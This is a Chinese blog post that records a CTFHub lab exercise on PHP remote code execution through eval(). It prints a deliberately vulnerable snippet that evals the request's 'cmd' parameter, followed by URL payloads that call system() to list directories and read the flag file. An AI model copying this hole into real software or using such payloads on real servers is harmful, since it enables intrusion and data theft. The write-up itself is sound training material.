技术栈

CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

上一篇:博客MDX渲染方案
下一篇:在IDE中使用Git
相关推荐
YangYang9YangYan
1 小时前
2026年工作后学习数据分析的价值与路径
学习·数据挖掘·数据分析
qeen87
2 小时前
【数据结构】树的基本概念及存储
c语言·数据结构·c++·学习·树
老唐777
6 小时前
常见经典十大大机器学习算法分类与总结
人工智能·深度学习·神经网络·学习·算法·机器学习·ai
烟雨孤舟
7 小时前
python 基础学习文档
学习
ECT-OS-JiuHuaShan
7 小时前
渡劫代谢,好事多磨
数据库·人工智能·科技·学习·算法·生活
2301_78094384
8 小时前
第三阶段:Gem5-GPU集成学习
学习
~kiss~
8 小时前
quantizers 学习
学习
暖阳之下
8 小时前
学习周报四十二
学习
wubba lubba dub dub750
8 小时前
第四十四周 学习周报
学习
黑眼圈子
10 小时前
动态规划问题专项练习(未编辑完成...
学习·算法·动态规划
热门推荐
01GitHub 镜像站点02近期有什么ai的新消息,新动态? 2026.4月032026年4月AI大事件深度解读:大模型竞争进入“深水区“042026年AI前瞻:量子AI、具身智能与科学发现的新纪元05在Windows 11上安装Docker的踩坑记录062026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元07codex app每次打开重连5次Reconnecting问题解决08Codex 接入 DeepSeek API 完整配置文档092026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot10DeepSeek V4 全面解析:测评、对比、案例及实操指南